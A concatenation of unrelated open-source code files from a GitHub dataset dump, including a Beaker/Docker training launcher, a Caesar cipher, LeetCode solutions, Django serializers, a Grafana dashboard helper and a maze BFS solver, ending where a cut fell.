shell=True)\n if result.returncode != 0:\n dirty_hash = \"%x\" % random.getrandbits(32)\n image += \"-\" + dirty_hash\n\n # Get temporary ecr login. For this command to work, you need the python awscli\n # package with a version more recent than 1.11.91.\n print(\"Logging into ECR\")\n subprocess.run('eval $(aws --region=us-west-2 ecr get-login --no-include-email)', shell=True, check=True)\n\n print(f\"Building the Docker image ({image})\")\n subprocess.run(f'docker build -t {image} .', shell=True, check=True)\n\n print(f\"Pushing the Docker image ({image})\")\n subprocess.run(f'docker push {image}', shell=True, check=True)\n\n config_dataset_id = subprocess.check_output(f'beaker dataset create --quiet {param_file}', shell=True, universal_newlines=True).strip()\n filename = os.path.basename(param_file)\n\n allennlp_command = [\n \"python\",\n \"-m\",\n \"allennlp.run\",\n \"train\",\n \"/config.json\",\n \"-s\",\n \"/output\",\n \"--file-friendly-logging\"\n ]\n\n # TODO(michaels): add back in the env list.\n # Presently this makes the Beaker UI unusably cluttered.\n command = [\n '/usr/local/bin/beaker',\n 'experiment',\n 'run',\n '--result-path',\n '/output',\n \"--source\",\n f\"{config_dataset_id}:/config.json\",\n '--gpu-count=1'] + env + extra_beaker_commands + [image] + allennlp_command\n print(' '.join(command))\n subprocess.run(command, check=True)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument('param_file', type=str, help='The model configuration file.')\n parser.add_argument('--desc', type=str, help='A description for the experiment.')\n parser.add_argument('--debug', action='store_true', help='Print verbose stack traces on error.')\n parser.add_argument('--env', action='append', help='Set environment variables (e.g. NAME=value or NAME)')\n parser.add_argument('--mount', action='append', help='Bind a host directory (e.g. /host/path:/target/path)')\n parser.add_argument('--source', action='append', help='Bind a remote data source (e.g. source-id:/target/path)')\n parser.add_argument('--cpu', help='CPUs to reserve for this experiment (e.g., 0.5)')\n parser.add_argument('--memory', help='Memory to reserve for this experiment (e.g., 1GB)')\n\n args = parser.parse_args()\n\n extra_beaker_commands = []\n if args.desc:\n extra_beaker_commands.append(f'--desc={args.desc}'),\n if args.debug:\n extra_beaker_commands.append(\"--debug\")\n if args.env:\n extra_beaker_commands.extend([f\"--env={env}\" for env in args.env])\n if args.mount:\n extra_beaker_commands.extend([f\"--mount={mount}\" for mount in args.mount])\n if args.source:\n extra_beaker_commands.extend([f\"--source={source}\" for source in args.source])\n if args.cpu:\n extra_beaker_commands.append(f\"--cpu={args.cpu}\")\n if args.memory:\n extra_beaker_commands.append(f\"--memory={args.memory}\")\n\n main(args.param_file, extra_beaker_commands)\n","repo_name":"deeppavlov/ner-meta","sub_path":"scripts/ai2-internal/run_with_beaker.py","file_name":"run_with_beaker.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"13903148684","text":"\"\"\"\nMisc functions used in other multiple other parts of the bot's code\n\"\"\"\n\nfrom discord.ext import commands\nimport discord\n\n\ndef is_bot_admin(user: discord.User | discord.Member):\n \"\"\"\n Checks if the user is a bot admin\n \"\"\"\n\n return (\n user.id == 229779964898181120\n ) # currently strictly checks if it is me\n\n\nasync def get_or_fetch_channel(bot: commands.Bot, channel_id):\n channel = bot.get_channel(channel_id)\n\n if channel is None:\n channel = await bot.fetch_channel(channel_id)\n\n return channel\n\n\nasync def get_or_fetch_message(channel, message_id):\n try:\n return await channel.fetch_message(message_id)\n except:\n return None\n","repo_name":"arcinfini/pyhnix","sub_path":"internal/utils/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26659411138","text":"print(\"\"\" \r\n ,adPPYba, ,adPPYYba, ,adPPYba, ,adPPYba, ,adPPYYba, 8b,dPPYba, \r\na8\" \"\" \"\" `Y8 a8P_____88 I8[ \"\" \"\" `Y8 88P' \"Y8 \r\n8b ,adPPPPP88 8PP\"\"\"\"\"\"\" `\"Y8ba, ,adPPPPP88 88 \r\n\"8a, ,aa 88, ,88 \"8b, ,aa aa ]8I 88, ,88 88 \r\n `\"Ybbd8\"' `\"8bbdP\"Y8 `\"Ybbd8\"' `\"YbbdP\"' `\"8bbdP\"Y8 88 \r\n 88 88 \r\n \"\" 88 \r\n 88 \r\n ,adPPYba, 88 8b,dPPYba, 88,dPPYba, ,adPPYba, 8b,dPPYba, \r\na8\" \"\" 88 88P' \"8a 88P' \"8a a8P_____88 88P' \"Y8 \r\n8b 88 88 d8 88 88 8PP\"\"\"\"\"\"\" 88 \r\n\"8a, ,aa 88 88b, ,a8\" 88 88 \"8b, ,aa 88 \r\n `\"Ybbd8\"' 88 88`YbbdP\"' 88 88 `\"Ybbd8\"' 88 \r\n 88 \r\n 88 \r\n\"\"\")\r\n\r\n\r\ndef encrypt(message: str, shift: int) -> str:\r\n \"\"\"\r\n\r\n :param message: string to be encrypted\r\n :param shift: number of positions each letter in message needs to be shifted\r\n by\r\n :return: encrypted string\r\n \"\"\"\r\n # upper ascii = [65, 90]\r\n # lower ascii = [97, 122]\r\n\r\n encrypted_msg = \"\"\r\n\r\n for letter in message:\r\n if letter == \" \":\r\n encrypted_msg += \" \"\r\n continue\r\n\r\n ascii_letter = ord(letter)\r\n shift_ascii = ascii_letter + shift\r\n\r\n if (letter.isupper() and shift_ascii > 90):\r\n shift_ascii = shift_ascii - 26\r\n\r\n if (letter.islower() and shift_ascii > 122):\r\n shift_ascii = shift_ascii - 26\r\n\r\n encrypted_msg += chr(shift_ascii)\r\n\r\n return encrypted_msg\r\n\r\n\r\ndef decrypt(message: str, shift: int) -> str:\r\n \"\"\"\r\n\r\n :param message: string to be decrypted\r\n :param shift: number of positions each letter in message was shifted by\r\n :return: decrypted string\r\n \"\"\"\r\n # upper ascii = [65, 90]\r\n # lower ascii = [97, 122]\r\n\r\n decrypted_msg = \"\"\r\n\r\n for letter in message:\r\n if letter == \" \":\r\n decrypted_msg += \" \"\r\n continue\r\n\r\n ascii_letter = ord(letter)\r\n shift_ascii = ascii_letter - shift\r\n\r\n if (letter.isupper() and shift_ascii < 65):\r\n shift_ascii = shift_ascii + 26\r\n\r\n if (letter.islower() and shift_ascii < 97):\r\n shift_ascii = shift_ascii + 26\r\n\r\n decrypted_msg += chr(shift_ascii)\r\n\r\n return decrypted_msg\r\n\r\n\r\ndef caesar_cipher(action: str, message: str, shift: int) -> str:\r\n \"\"\"\r\n\r\n :param action: whether user wants to encrypt or decrypt\r\n :param message: message to be encrypted or decrypted\r\n :param shift: number of positions each letter in message is shifted by\r\n :return: encrypted or decrypted message\r\n \"\"\"\r\n msg = \"\"\r\n if action == 'encode':\r\n msg = encrypt(message, shift)\r\n\r\n if action == 'decode':\r\n msg = decrypt(message, shift)\r\n\r\n return msg\r\n\r\n\r\nagain = \"yes\"\r\nwhile again == \"yes\":\r\n user_action = input(\r\n \"Type 'encode' to encrypt, type 'decode' to decrypt: \").lower()\r\n while user_action not in ['encode', 'decode']:\r\n user_action = input('Invalid command. Please try again.')\r\n\r\n user_message = input(\"Type your message: \")\r\n\r\n user_shift = int(input(\"Type the shift number: \"))\r\n\r\n print(\r\n f'Your {user_action}d message is: {caesar_cipher(user_action, user_message, user_shift)}')\r\n again = input(\r\n \"Type 'yes' if you want to go again. Otherwise, type 'no': \").lower()\r\n","repo_name":"InfinityCent/100_Days_Of_Code","sub_path":"Projects/Day8-CaesarCipher.py","file_name":"Day8-CaesarCipher.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29920796731","text":"\"\"\"'''思路:\n思路一: 库函数'''\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n res = []\n for i in range(len(nums) + 1):\n for tmp in itertools.combinations(nums, i):\n res.append(tmp)\n return res\n\n\n'''思路二: 迭代'''\n\n\nclass Solution1:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n res = [[]]\n for i in nums:\n res = res + [[i] + num for num in res]\n return res\n\n\n\"\"\"思路三: 递归(回溯算法)\"\"\"\n\n\nclass Solution2:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n res = []\n n = len(nums)\n\n def helper(i, tmp):\n res.append(tmp)\n for j in range(i, n):\n helper(j + 1, tmp + [nums[j]])\n\n helper(0, [])\n return res","repo_name":"ANh0r/LeetCode-Daily","sub_path":"9.20 subsetAll.py","file_name":"9.20 subsetAll.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"71430530493","text":"import logging\n\n\ndef get_logger(mod_name: str, file_name: str):\n logger = logging.getLogger(mod_name)\n logger.setLevel(logging.INFO)\n logger.propagate = False\n handler = logging.FileHandler(file_name)\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter(fmt='%(asctime)s [%(name)s %(funcName)s] %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n return logger\n\n\n","repo_name":"zhaochj/mschedule","sub_path":"agent/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"37729648768","text":"from rest_framework import serializers\n\nfrom marketapp.models import (\n Category,\n Product,\n ProductCategoryM2M,\n # ProductFeatureM2M,\n)\nfrom restapiapp.categoriesapi.serializers import CategorySerializer\n# from restapiapp.featuresapi.serializers import (\n# # FeatureSerializer,\n# # FeatureValuesSerializer,\n# )\nfrom utils.serializers import (\n LogoModelSerilizerMixin,\n IsActiveTrueSerializerMixin,\n)\n\n\n# class ProductFeatureM2MSerializer(serializers.ModelSerializer):\n# \"\"\"Сериалайзер для множественной связи Свойств и Продуктов\"\"\"\n# featurevalue = FeatureValuesSerializer(\n# label='Значение свойства продукта',\n# help_text='Значение свойства продукта',\n# read_only=True,\n# )\n#\n# class Meta:\n# model = ProductFeatureM2M\n# fields = (\n# # 'feature',\n# 'featurevalue',\n# )\n\n\nclass ProductSerializer(\n LogoModelSerilizerMixin,\n IsActiveTrueSerializerMixin,\n serializers.ModelSerializer\n):\n \"\"\"\n Сериалайзер для товара\n \"\"\"\n\n user = serializers.CharField(\n source='user.username',\n label='Пользователь',\n help_text='Создатель товара',\n read_only=True,\n )\n # feature_set = ProductFeatureM2MSerializer(\n # source='productfeaturem2m_set',\n # read_only=True,\n # many=True,\n # )\n\n class Meta:\n model = Product\n fields = (\n 'uuid',\n 'is_active',\n 'name',\n 'desc',\n 'logo',\n 'logo_small',\n 'logo_big',\n 'logo_large',\n 'time_updated',\n 'time_created',\n 'time_publish',\n 'time_depublish',\n 'user',\n 'price',\n 'temporary_price',\n 'rating',\n 'owner_rating',\n # 'feature_set',\n )\n\n\nclass ProductCategorySerialzer(serializers.ModelSerializer):\n \"\"\"Сериалайзер для отображения категории в API для продукта\"\"\"\n category = serializers.SlugRelatedField(\n slug_field='uuid',\n queryset=Category.objects.all(),\n label=ProductCategoryM2M._meta.get_field('category').verbose_name,\n help_text='uuid категории, связанной с продуктом',\n )\n category_detail = CategorySerializer(\n source='category',\n read_only=True,\n )\n\n class Meta:\n model = ProductCategoryM2M\n fields = (\n 'category',\n 'category_detail',\n )\n\n\nclass CategoryProductSerialzer(serializers.ModelSerializer):\n \"\"\"Сериалайзер для отображения продукта в API для категории\"\"\"\n product = serializers.SlugRelatedField(\n slug_field='uuid',\n queryset=Product.objects.all(),\n label=ProductCategoryM2M._meta.get_field('product').verbose_name,\n help_text='uuid продукта, связанного с категорией',\n )\n product_detail = CategorySerializer(\n source='product',\n read_only=True,\n )\n\n class Meta:\n model = ProductCategoryM2M\n fields = (\n 'product',\n 'product_detail',\n )\n\n\nclass ProductCategoryM2MSerializer(ProductCategorySerialzer, CategoryProductSerialzer):\n \"\"\"\n Сериалайзер для связи Product-Category\n \"\"\"\n\n class Meta:\n model = ProductCategoryM2M\n fields = (\n 'category',\n 'product',\n 'category_detail',\n 'product_detail',\n )\n\n","repo_name":"smokost/CV","sub_path":"portfolio/Django-Market/restapiapp/productsapi/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19489170473","text":"from __future__ import annotations\nimport torch\nfrom random import shuffle\n\nclass FlipNotPossible(Exception): pass\nclass SortNotPossible(Exception): pass\n\nclass Stack:\n \"\"\"Class to represent pancake stacks as declared by BWINF 41 in 2023 challenge 3.\"\"\"\n def __init__(self, items: list) -> None:\n self.height = len(items)\n self.pancakes = items\n \n def __len__(self) -> int:\n return len(self.pancakes)\n \n def flip(self, pos: int) -> None:\n \"\"\"Takes all pancakes before pos, flips them and then deletes the topmost pancake\n \n Args:\n pos (int): Where the stack will be flipped\n\n Raises:\n FlipNotPossible: When the given pos is outside of the range 0-height\n \"\"\"\n if pos > len(self.pancakes): raise FlipNotPossible\n rest = self.pancakes[pos:]\n toFlip = self.pancakes[:pos]\n toFlip.reverse()\n self.pancakes = toFlip + rest\n self.pancakes.pop(0)\n \n def is_sorted(self) -> bool:\n \"\"\"\n Returns:\n bool: True when self.pancakes is sorted.\n \"\"\"\n return self.pancakes == sorted(self.pancakes)\n\n def print(self, pre=\"\", post=\"\"):\n \"\"\"Prints `self.pancakes`\"\"\"\n print(pre, self.pancakes, post)\n \n def create_random(height: int) -> Stack:\n \"\"\"Returns a randomized Stack where object.height equals given height.\n\n Args:\n height (int): Height of random Stack.\n\n Returns:\n object: Stack object\n \"\"\"\n pancakes = [*range(1, height + 1)]\n shuffle(pancakes)\n return Stack(pancakes)\n \n def as_tensor(self, fill=False, normalized=True) -> torch.Tensor:\n \"\"\"Returns self.pancakes as torch.Tensor with size self.height by adding zeros in front if necessary.\n\n Returns:\n torch.Tensor: self.pancakes as Tensor\n \"\"\"\n out = [0 for _ in range(self.height - len(self.pancakes)) if fill]\n if fill and not normalized:\n out += self.pancakes\n return torch.tensor(out, dtype=torch.float32)\n \n for i in self.pancakes:\n out.append(sorted(self.pancakes).index(i) + 1)\n\n return torch.tensor(out, dtype=torch.float32)\n\n def from_file(filename: str) -> Stack:\n data = []\n with open(filename, \"r\") as file:\n lines = file.readlines()\n for line in range(1, len(lines)):\n out = \"\"\n for i in lines[line]:\n if i == \"\\\\\": break\n out += i\n data.append(int(out))\n return(Stack(data))\n \n def unpack(self) -> list:\n return self.pancakes\n\n def sort_by_ai(self) -> list:\n nets = []\n for i in range(len(self), 1, -1):\n try:\n with open(f\"./nnet/trained_nets/net{i}.save\", \"rb\") as file:\n nets.append(torch.load(file))\n except FileNotFoundError:\n raise FileNotFoundError(\"Not every necessary pretrained NN was found\")\n \n flips = []\n for (i, net) in enumerate(nets):\n if self.is_sorted(): break\n flips.append(net(self.as_tensor()).argmax().item() + 1)\n self.flip(flips[-1])\n return flips","repo_name":"TeeFederFisch/BWINF_r2","sub_path":"Aufgabe3/AusfuehrbaresProgramm/nnet/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26279515950","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\n\r\nclass Renderer:\r\n\r\n def __init__(self, grid, cell_size=1):\r\n self.grid = grid\r\n self.cell_size = cell_size\r\n width, height = self.grid.size\r\n self.fig, self.ax = plt.subplots(figsize=(width * self.cell_size / 80, height * self.cell_size / 80))\r\n self.image = self.ax.imshow(self.grid.grid.compute(), cmap='gray_r', interpolation='nearest', aspect='auto')\r\n plt.axis('off')\r\n\r\n def update(self, *args):\r\n self.grid.evolve()\r\n self.image.set_array(self.grid.grid.compute())\r\n return self.image,\r\n\r\n def render(self, epochs, record=False):\r\n ani = animation.FuncAnimation(self.fig, self.update, epochs, blit=True)\r\n if record:\r\n try:\r\n writer = animation.writers['ffmpeg'](fps=10, metadata=dict(artist='Conway\\'s Game of Life'))\r\n ani.save(\"game_of_life.mp4\", writer=writer)\r\n except RuntimeError:\r\n print('Error: ffmpeg is not installed. Please install it to record the video.')\r\n return ani\r\n","repo_name":"nalienffxi/Game_of_Life","sub_path":"renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7908419127","text":"from collections import deque\r\nimport sys\r\nimport os\r\n\r\nscript_dir = os.path.dirname(__file__) #<-- absolute dir the script is in\r\n# rel_path = 'running_on_fumes_chapter_1_input_sample.txt'\r\nrel_path = 'running_on_fumes_chapter_1_input.txt'\r\nabs_file_path = os.path.join(script_dir, rel_path)\r\nin_file = open(abs_file_path, 'r')\r\n\r\nout_file_check = True\r\nrel_path = rel_path.replace('_input', '_output')\r\nabs_file_path = os.path.join(script_dir, rel_path)\r\nout_file = open(abs_file_path, 'w')\r\n\r\ndef printf(s, linebreak = True):\r\n #print(s) \r\n if out_file_check:\r\n if linebreak:\r\n out_file.write(s + '\\n')\r\n else:\r\n out_file.write(s)\r\n\r\ndef running_on_fumes_chapter_1():\r\n N, M = map(int, in_file.readline().strip().split())\r\n C = [int(in_file.readline()) for _ in range(N)]\r\n dq = deque([(0, 0)])\r\n for i in range(1, len(C)):\r\n count = 0\r\n if dq and i-dq[0][0] > M:\r\n count += 1\r\n dq.popleft()\r\n if not dq:\r\n return -1\r\n if not C[i]:\r\n continue\r\n #print(dq[0][1],C[i])\r\n d = dq[0][1] + C[i]\r\n while dq and dq[-1][1] >= d:\r\n dq.pop()\r\n dq.append((i, d)) \r\n return dq[0][1]\r\n\r\nt = int(in_file.readline())\r\nfor case in range(t):\r\n check_result = running_on_fumes_chapter_1()\r\n if(case < t - 1):\r\n printf('Case #{}: {}'.format(case+1, check_result))\r\n else:\r\n printf('Case #{}: {}'.format(case+1, check_result), linebreak=False)\r\nout_file.close()\r\n\r\n","repo_name":"radadiyamohit81/Facebook_HackerCup-2020","sub_path":"Chap-1/Running_Fumes-chap1.py","file_name":"Running_Fumes-chap1.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"377844955","text":"\"\"\"\ninitializer\n\nCreated by: Martin Sicho\nOn: 7/16/20, 1:54 PM\n\"\"\"\nfrom genui.compounds.extensions.fileimports.initializer import FileInitializer\nfrom genui.compounds.models import ActivityUnits, ActivityTypes, Activity, ActivitySet\nfrom genui.utils.exceptions import GenUIException\nfrom .models import CSVMolecule\n\nclass CSVParsingError(GenUIException):\n pass\n\nclass CSVSetInitializer(FileInitializer):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.activitySet = None\n\n def parserCallback(self, smile, props):\n molecule = self.addMoleculeFromSMILES(smile, CSVMolecule, {'name' : props['name']})\n print(f'Imported molecule: {molecule.name}')\n\n # attach activities\n if 'activityType' in props and 'activity' in props:\n value = props['activity']\n if not value or value == self.instance.emptyValue or type(value) not in (int, float):\n self.errors.append(CSVParsingError(None, f'Failed to parse an activity value ({value}) for molecule {molecule.name} : {smile}'))\n return\n value = float(value)\n\n _type = props['activityType']\n if not _type or _type == self.instance.emptyValue or type(_type) != str:\n self.errors.append(CSVParsingError(None, f'Failed to parse activity type ({_type}) for molecule {molecule.name} : {smile}'))\n return\n _type = ActivityTypes.objects.get_or_create(value=_type)[0]\n\n if not self.activitySet:\n self.activitySet = ActivitySet.objects.create(\n name=f'{self.instance.name} (activities from file)',\n project=self.instance.project,\n molecules=self.instance,\n )\n\n units = props['activityUnits']\n units = None if not units or type(units) != str else ActivityUnits.objects.get_or_create(value=units)[0]\n\n Activity.objects.create(\n value=value,\n type=_type,\n units=units,\n source=self.activitySet,\n molecule=molecule\n )\n print(f\"Imported activity value: {_type.value} = {value} {units.value if units else ''}\")\n\n def populateInstance(self):\n self.parseMols(self.parserCallback)\n return self.unique_mols\n\n","repo_name":"martin-sicho/genui","sub_path":"src/genui/compounds/extensions/csvimports/initializer.py","file_name":"initializer.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"81"} +{"seq_id":"4354827037","text":"# Load /split training/testing data\n\nimport pickle\nfrom sklearn.model_selection import train_test_split\n\nSEED = 20171110\n\nclass DetectionData:\n def __init__(self, graphic, even=False, train_size=None):\n self.x_train, self.x_test, self.y_train, self.y_test = get_data(graphic, even, 1, train_size)\n\n\nclass LocationData:\n def __init__(self, graphic, train_size=None):\n self.x_train, self.x_test, self.y_train, self.y_test = get_data(graphic, False, 2, train_size)\n\ndef get_data (graphic, even, type, train_size):\n x_set = []\n y_set = []\n\n if graphic == 'combined' or graphic == 'both':\n graphics = ['heterographic', 'homographic']\n even = False # don't use even when running with both types as I think there would be some repeat data using even?\n else:\n graphics = [graphic]\n\n for g in graphics:\n\n path = \"./data/pickles/test-%d-%s\" % (type, g)\n\n\n if even:\n path += \"-even\"\n\n path += \".pkl.gz\"\n\n with open(path, 'rb') as f:\n x, y = pickle.load(f)\n x_set += x\n\n if graphic == 'both' and g == 'heterographic':\n if type == 1:\n y_set += list(map(lambda x: 2 if x == 1 else 0, y))\n else :\n # Can't currently use both for location data so just use combined for now\n y_set += y\n else:\n y_set += y\n\n return train_test_split(x_set, y_set, random_state=SEED, train_size=train_size)\n\n\n","repo_name":"hneutr/pun_classifier","sub_path":"pun_data.py","file_name":"pun_data.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71335757386","text":"\"\"\"Push and pull Grafana dashboards.\"\"\"\nfrom typing import Optional, Tuple\n\nfrom grafana_client import GrafanaApi\n\nfrom grafanarmadillo._util import project_dashboard_identity\nfrom grafanarmadillo.types import (\n\tDashboardContent,\n\tDashboardSearchResult,\n\tFolderSearchResult,\n)\n\n\nclass Dashboarder(object):\n\t\"\"\"Collection of methods for managing dashboards.\"\"\"\n\n\tdef __init__(self, api: GrafanaApi) -> None:\n\t\tsuper().__init__()\n\t\tself.api = api\n\n\tdef get_dashboard_content(self, dashboard: DashboardSearchResult) -> DashboardContent:\n\t\t\"\"\"Get the contents of a Grafana dashboard.\"\"\"\n\t\treturn self.api.dashboard.get_dashboard(dashboard[\"uid\"])[\"dashboard\"]\n\n\tdef set_dashboard_content(\n\t\tself, dashboard: DashboardSearchResult, content: DashboardContent\n\t):\n\t\t\"\"\"\n\t\tSet the content of a Grafana dashboard.\n\t\t\n\t\tThis explicitly leaves out the identity information.\n\t\tThat allows you to graft the contents of a dashboard into another\n\t\t\"\"\"\n\t\tnew_dashboard = dashboard.copy()\n\t\tnew_content = content.copy()\n\n\t\tnew_content.update(project_dashboard_identity(new_dashboard))\n\n\t\tnew_dashboard.update({\"dashboard\": new_content, \"overwrite\": True})\n\n\t\treturn self.api.dashboard.update_dashboard(new_dashboard)\n\n\tdef import_dashboard(\n\t\tself, content: DashboardContent, folder: Optional[FolderSearchResult] = None\n\t):\n\t\t\"\"\"Import a dashboard into Grafana, optionally into a folder.\"\"\"\n\t\tcontent.pop(\"id\", None)\n\t\tnew_dashboard = {\"dashboard\": content, \"overwrite\": True}\n\t\tif folder:\n\t\t\tnew_dashboard.update({\"folderUid\": folder[\"uid\"], \"folderId\": folder[\"id\"]})\n\n\t\treturn self.api.dashboard.update_dashboard(new_dashboard)\n\n\tdef export_dashboard(\n\t\tself, dashboard: DashboardSearchResult\n\t) -> Tuple[DashboardContent, Optional[FolderSearchResult]]:\n\t\t\"\"\"Export a dashboard from grafana, with its folder information if applicable.\"\"\"\n\t\tresult = self.api.dashboard.get_dashboard(dashboard[\"uid\"])\n\t\tmeta, dashboard = result[\"meta\"], result[\"dashboard\"]\n\t\tif meta[\"folderUid\"]:\n\t\t\tfolder = self.api.folder.get_folder(meta[\"folderUid\"])\n\t\telse:\n\t\t\tfolder = None\n\n\t\treturn dashboard, folder\n","repo_name":"lilatomic/grafanarmadillo","sub_path":"src/grafanarmadillo/dashboarder.py","file_name":"dashboarder.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"73703084426","text":"import os\n\nfrom flask import Flask\nfrom flask_login import LoginManager\nfrom pony.flask import Pony\n\nfrom .cache import cache\nfrom .models import db, User\nfrom .views import users as users_view, contests as contests_view\n\napp = Flask(__name__)\n\nconfig_class = (os.getenv('FLASK_ENV') or 'test').title() + 'Config'\napp.config.from_object(f'aivivn_backend.config.{config_class}')\n\ndb.bind(**(app.config['PONY_PROVIDER']))\ndb.generate_mapping(create_tables=app.config['ENV'] != 'production')\n\nPony(app)\n\nlogin_manager = LoginManager(app)\n\ncache.init_app(app, config=app.config)\n\n\n@login_manager.header_loader\ndef load_user_from_header(header_val):\n access_token = header_val.replace('Bearer ', '', 1)\n return User.get_user_from_token(access_token)\n\n\n@app.route('/ping')\ndef ping():\n return 'pong'\n\n\napp.register_blueprint(users_view.bp)\napp.register_blueprint(contests_view.bp)\n","repo_name":"thang148/DEV","sub_path":"backend/aivivn_backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7410632073","text":"from collections import deque\nimport sys\n\ninput = sys.stdin.readline\n\n# N, M <= 50\nN, M = map(int, input().rstrip().split())\n\nmaps = [list(input().rstrip()) for _ in range(N)]\n\nstart_r, start_c = -1, -1\nfor r in range(N):\n for c in range(M):\n if maps[r][c] == '0':\n maps[r][c] = '.'\n start_r, start_c = r, c\n\nq = deque()\nvisited = [[[1e9 for _ in range(2**6)] for _ in range(M)] for _ in range(N)]\n\nq.append((0, start_r, start_c, 0))\nvisited[start_r][start_c][0b000000] = 0\n\nmoves = ((-1, 0), (1, 0), (0, -1), (0, 1))\nanswer = -1\n\nwhile q:\n level, r, c, key = q.popleft()\n\n if maps[r][c] == '1':\n answer = level\n break\n\n for dr, dc in moves:\n if 0 <= r + dr < N and 0 <= c + dc < M:\n # 0. 출구인 경우\n if maps[r + dr][c + dc] == '1':\n q.appendleft((level + 1, r + dr, c + dc, key))\n # 1. 벽인 경우 -> 이동 불가\n elif maps[r + dr][c + dc] == '#': continue\n # 2. 열쇠인 경우 -> key 갱신 후 방문\n elif maps[r + dr][c + dc] in ['a', 'b', 'c', 'd', 'e', 'f']:\n new_key = key | (1 << (ord(maps[r + dr][c + dc]) - ord('a')))\n \n if visited[r + dr][c + dc][new_key] > level + 1:\n visited[r + dr][c + dc][new_key] = level + 1\n q.append((level + 1, r + dr, c + dc, new_key))\n # 3. 문인 경우 -> 해당 열쇠를 얻은 상태에서만 통과\n elif maps[r + dr][c + dc] in ['A', 'B', 'C', 'D', 'E', 'F']:\n if key & (1 << (ord(maps[r + dr][c + dc]) - ord('A'))):\n if visited[r + dr][c + dc][key] > level + 1:\n visited[r + dr][c + dc][key] = level + 1\n q.append((level + 1, r + dr, c + dc, key))\n # 4. 빈 칸인 경우\n elif maps[r + dr][c + dc] == '.':\n if visited[r + dr][c + dc][key] > level + 1:\n visited[r + dr][c + dc][key] = level + 1\n q.append((level + 1, r + dr, c + dc, key))\n\nprint(answer)\n","repo_name":"poodlepoodle/problem-solving","sub_path":"baekjoon/1194_2.py","file_name":"1194_2.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"12548217430","text":"from more.marshmallow import Error\n\nfrom .app import App\nfrom . import model\nfrom .schemas import AnalysisSchema\n\n\n@App.html(model=model.Data, template='map.pt')\ndef view_map(self, request):\n return {\n 'bounds': self.bounds\n }\n\n\nschema = AnalysisSchema()\n\n\ndef load_analyse_params(request):\n if request.content_type == 'application/json':\n data = request.json\n else:\n data = parse_params(request.params)\n data, errors = schema.load(data)\n if errors:\n raise Error(errors)\n return data\n\n\ndef parse_params(params):\n \"\"\"Parse parameters into a dictionary with sub dicts.\"\"\"\n data = []\n for item in params.items():\n item = split_item(*item)\n data.append(item)\n return merge(data)\n\n\ndef merge(data):\n if not data:\n return {}\n if len(data) == 1:\n return data[0]\n return merge_dicts(data[0], merge(data[1:]))\n\n\ndef merge_dicts(d1, d2):\n \"\"\"Merge two dicts and any subdicts they might have.\"\"\"\n result = d1.copy()\n for key, val in d2.items():\n if key not in result:\n result[key] = val\n else:\n result[key] = merge_dicts(result[key], val)\n return result\n\n\ndef split_item(key, value):\n \"\"\"Split an item like ('key[subkey]', 'value') into\n {'key': {'subkey': 'value'}}.\n \"\"\"\n split_key = key.rsplit('[', 1)\n if len(split_key) == 1:\n return {split_key[0]: value}\n key = split_key[0]\n value = {split_key[1][:-1]: value}\n return split_item(key, value)\n\n\n@App.json(model=model.Data, request_method='POST', load=load_analyse_params)\ndef view_analysis(self, request, analyse_params):\n result = self.analyse(**analyse_params)\n return model.Data.json_parsable(result)\n","repo_name":"inytar/door2door-assignment","sub_path":"d2d/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1235718236","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 30 20:03:12 2014\n\n@author: edouard.duchesnay@cea.fr\n\nmkdir /neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv\ncd /neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv\n\ncp ../MCIc-CTL-FS/X* .\ncp ../MCIc-CTL-FS/y.npy 